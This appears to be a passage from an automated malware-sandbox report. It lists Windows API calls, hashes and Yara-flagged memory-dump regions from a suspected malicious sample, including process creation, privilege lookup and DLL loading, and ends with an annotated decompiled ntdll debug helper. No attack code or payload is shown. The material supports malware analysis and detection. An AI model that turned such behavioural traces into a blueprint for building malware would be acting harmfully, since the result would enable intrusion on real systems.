                                        • Opcode Fuzzy Hash: 7403f2acc01ffc903747f9ad7c4c0f66e784e99171c38e606e70ab9631e75841
                                        • Instruction Fuzzy Hash: 7C9002A1202045138145B5994424656401AD7E0241B51C071E21086B0DC66598997165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 51067d29f6a02725b6f10a46f71d2e067cee78a8e05faa8165a8f2b4302ef367
                                        • Instruction ID: efec66e0f4f3ac154541c43b95743379dc0090ee81ebf483a1959da16c5f1cdf
                                        • Opcode Fuzzy Hash: 51067d29f6a02725b6f10a46f71d2e067cee78a8e05faa8165a8f2b4302ef367
                                        • Instruction Fuzzy Hash: F4900265211045134145E99907145470056D7D5391351C071F2109670CD76198696161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D53AF8), ref: 00D6A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: 8590a9281bb37ae7a434dd84bab428fe3c8307f1961cea228e528dec5b50d9b3
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: AFE04FB12002086BD714DF59CC45EA777ACEF88750F118555FD4867241C630F910CAF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D53AF8), ref: 00D6A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                        • Instruction ID: bc73a3b3cafd84156b33b92d056509054520d2e9c69dae533bc85d85d83d00fb
                                        • Opcode Fuzzy Hash: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                        • Instruction Fuzzy Hash: 1CE046B1200204AFDB18DF68CC88EE73768EF88350F118659F94CAB241C631E910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D5834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D5836B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                        • Instruction ID: 9c2c84074f75386f05a63094c36308a7609cf7a243678859b4fc0968d57f0110
                                        • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                        • Instruction Fuzzy Hash: C601A731A802287BEB20A6999C43FBE776CAB40F51F044115FF04FA1C1EAD4790A46F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D5AD42
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction ID: 6dbd7fb0f981e5f03a9f2737030ce118368fce49ee376aea9878c7566710f3b7
                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction Fuzzy Hash: 9C011EB5E0020DABDF10EBE4DC42FADB3789B54309F144295AD08A7241F671EB588BB2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D5AD42
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction ID: 4386f73e23655cfb63c1a9edcbd4d54fef879538d8108544b01794030a25e55a
                                        • Opcode Fuzzy Hash: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction Fuzzy Hash: 17015EB5E0014AABDF10DFA8DC41FEDB775AB54309F148299ED08A6142F631A7188BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00D6A134
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 698bb61cbf346b7ca8d815428a09d33944ab96ddbf40aed6c8f6ea9c6184deac
                                        • Instruction ID: 502445cfac91eb7692658006a262a10fd6c8bbb76fb81c4cf89d21e7676d227d
                                        • Opcode Fuzzy Hash: 698bb61cbf346b7ca8d815428a09d33944ab96ddbf40aed6c8f6ea9c6184deac
                                        • Instruction Fuzzy Hash: 0601AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA5DA7241D630E851CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00D6A134
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: 51da907d85a1689751eae6823c8d7287475cc636231202b9193381a89585f98c
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: 8F01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA4DA7241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction ID: 27d04f2dd04394a38c82c928f77f447a6cdfd6f77b5a480c26d94bac351fad3e
                                        • Opcode Fuzzy Hash: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction Fuzzy Hash: DDF0EC362102146BD710EB98DC45DE7B7E9DFC4320B14C54AF99C57302C531E9058BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: ee74257f2377764a350c8b97fa778e0872fd84b3618d21fd4a2e2923eed34e93
                                        • Instruction ID: b4f819b796c3c51ebb962bb5164af1f3b7a99209bf768d0fb2fba062e9f1fec2
                                        • Opcode Fuzzy Hash: ee74257f2377764a350c8b97fa778e0872fd84b3618d21fd4a2e2923eed34e93
                                        • Instruction Fuzzy Hash: 64F0A0B16102046FDB10DF64CC89EE77BA8EF45310F008566F98897201D630A411CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00D64506,?,00D64C7F,00D64C7F,?,00D64506,?,?,?,?,?,00000000,00000000,?), ref: 00D6A05D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: 4d5899a6a9b266f1fc7280de19c28a78104832997a72ad9b6d55af4f3f7b59ee
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 15E046B1200208ABDB14EF99CC81EA777ACEF88750F118559FE486B242C630F910CBF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: 15b0cd9bbb7d8d7eb6305437327a2569690fa0827600ab60669e71fa77df9686
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: 3CE01AB12002086BDB10DF49CC85EE737ADEF88750F118155FA4867241C930E8108BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,00D58CF4,?), ref: 00D5F6CB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: c47c1e8a53ab1586d6a385345e338d9cfe916352efd7ef1e102023afcef54b19
                                        • Instruction ID: 31d8ba454c34130bdc543924c6f54650e1a357d99b3ae4f78105c3795315da66
                                        • Opcode Fuzzy Hash: c47c1e8a53ab1586d6a385345e338d9cfe916352efd7ef1e102023afcef54b19
                                        • Instruction Fuzzy Hash: 73E0DF727802016EEF10FF64CD43F6AB381AB06340F0904B8FD949F6C7E620E0228666
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,00D58CF4,?), ref: 00D5F6CB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction ID: e976baf6f63ec388c6a9187b983a9c6c99052c9f2a667820f81c8af774792e86
                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction Fuzzy Hash: 22D052626A03083BEA10FAA89C03F26328AAB45B01F490064FA88AA2C3E960E4008175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a1416a8be69c8ebd927cd5773dfd3c53d840b7eac7328e8fadcb21a79a8e5cd6
                                        • Instruction ID: becbc2d99735c6a5e340f4b3b43b90b3dc0c613ba4a2303fe36e727386adf0cd
                                        • Opcode Fuzzy Hash: a1416a8be69c8ebd927cd5773dfd3c53d840b7eac7328e8fadcb21a79a8e5cd6
                                        • Instruction Fuzzy Hash: 80B02B718014C9C6E600D7E006087173900BBC0300F17C0E1D2024350A4338C084F1B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 53%
                                        			/* Non-executed ntdll helper. The two format strings and the raw structure
                                        			 * offsets below match the debug path ntdll takes when a critical-section
                                        			 * wait exceeds its timeout. Callers pass the waited-on RTL_CRITICAL_SECTION
                                        			 * in a register the decompiler left unnamed (_t12/_t15) and, in __edx, a
                                        			 * pointer to the 64-bit relative timeout. Field names in the comments are
                                        			 * inferred from the public x86 layouts (winnt.h). */
                                        			E038FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                        				void* _t7;        /* decompiler artefact: only the low half of a 64-bit result */
                                        				intOrPtr _t9;
                                        				intOrPtr _t10;
                                        				intOrPtr* _t12;
                                        				intOrPtr* _t13;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t13 = __edx;
                                        				_push(_a4);
                                        				_t14 =  *[fs:0x18];                                   /* x86: NT_TIB.Self, i.e. this thread's TEB */
                                        				_t15 = _t12;                                          /* RTL_CRITICAL_SECTION* (register argument) */
                                        				/* Inferred 64-bit signed divide: (low, high) of the timeout, in 100 ns units and
                                        				 * negative for a relative wait, divided by 0xffffffff_ff676980 == -10,000,000,
                                        				 * which yields whole seconds for the "%I64u secs" field. */
                                        				_t7 = E038ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                        				_push(_t13);
                                        				/* E038F5720 has the DbgPrintEx(ComponentId, Level, Format, ...) shape (inferred);
                                        				 * 0x65 corresponds to DPFLTR_DEFAULT_ID, level 1 = warning, level 0 = error. */
                                        				E038F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                        				_t9 =  *_t15;                                         /* RTL_CRITICAL_SECTION.DebugInfo */
                                        				if(_t9 == 0xffffffff) {                               /* no debug block allocated */
                                        					_t10 = 0;
                                        				} else {
                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));               /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount */
                                        				}
                                        				_push(_t10);
                                        				_push(_t15);                                          /* the critical section itself (%p) */
                                        				_push( *((intOrPtr*)(_t15 + 0xc)));                   /* RTL_CRITICAL_SECTION.OwningThread */
                                        				_push( *((intOrPtr*)(_t14 + 0x24)));                  /* TEB.ClientId.UniqueThread */
                                        				/* last argument: TEB.ClientId.UniqueProcess (offset 0x20) */
                                        				return E038F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                        			}

                                        0x038ffdda
                                        0x038ffde2
                                        0x038ffde5
                                        0x038ffdec
                                        0x038ffdfa
                                        0x038ffdff
                                        0x038ffe0a
                                        0x038ffe0f
                                        0x038ffe17
                                        0x038ffe1e
                                        0x038ffe19
                                        0x038ffe19
                                        0x038ffe19
                                        0x038ffe20
                                        0x038ffe21
                                        0x038ffe22
                                        0x038ffe25
                                        0x038ffe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038FFDFA
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038FFE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038FFE2B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: a359b999f3b12211a8a51fe6289f544b03c11b80dd2ab3b02149676d364a5d6a
                                        • Instruction ID: 4379a321ca7213496294ca151421d8d96703138ca150341cf3a876642ff777f9
                                        • Opcode Fuzzy Hash: a359b999f3b12211a8a51fe6289f544b03c11b80dd2ab3b02149676d364a5d6a
                                        • Instruction Fuzzy Hash: B3F0FC36540601BFDA205AC9DC01F27BF5ADB45730F140354F724D91D1D962F83086F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%